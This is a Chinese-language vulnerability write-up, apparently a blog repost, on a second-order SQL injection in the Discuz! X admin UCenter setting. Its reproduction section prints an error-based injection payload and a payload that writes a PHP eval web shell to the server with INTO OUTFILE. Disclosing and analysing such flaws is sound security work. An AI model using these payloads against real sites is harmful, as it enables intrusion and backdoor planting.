zoukankan      html  css  js  c++  java
  • 【漏洞分析】Discuz! X系列全版本后台SQL注入漏洞

     

    0x01漏洞描述

    Discuz!X全版本存在SQL注入漏洞。漏洞产生的原因是sourceadmincpadmincp_setting.php在处理$settingnew['uc']['appid']参数时未进行完全过滤,导致出现二次注入。在特定条件下,攻击者可以利用该漏洞获取服务器权限。

    0x02影响范围

    Discuz! X系列全版本,截止Discuz!X最新的Discuz! X3.4 R20191201版本

    0x03漏洞详情

    (1)sourceadmincpadmincp_setting.php第2571行,用户可控参数$settingnew['uc']['appid']替换掉.configconfig_ucenter.php配置文件中的常量UC_APPID的值,并写入配置文件

     

    (2)uc_clientmodelase.php第206行,UC_APPID直接拼接到SQL语句中

     

    (3)当调用函数时将触发二次注入

     

     

    0x04漏洞复现

    (1)在站长-UCenter设置下的应用ID中输入1’

     

    (2)访问首页将触发产生SQL报错

     

    (3)故可以插入其他测试payload

    1' and (updatexml(1,concat(0x7e,(select version()),0x7e),1));-- a

     

    (4)写马

    1' union select '<?php @eval($_POST[1]);?>' into outfile 'C:/phpStudy/PHPTutorial/WWW/shell.php';-- a

     

     

    0x05修复建议

    (1)后台不使用弱口令

    (2)官方暂未发布补丁,关注官方补丁信息

  • 相关阅读:
    wpf 获取datagrid中模板中控件
    WPF DataGrid DataGridTemplateColumn 控制模板中控件
    ztree实现拖拽移动和复制
    layui的select监听
    layui父页面获取子页面数据
    win10安装网络适配器
    bat启动OpenOffice4
    java注解简单使用
    win7安装IIS
    java的Array和List相互转换
  • 原文地址:https://www.cnblogs.com/0nth3way/p/12025287.html
Copyright © 2011-2022 走看看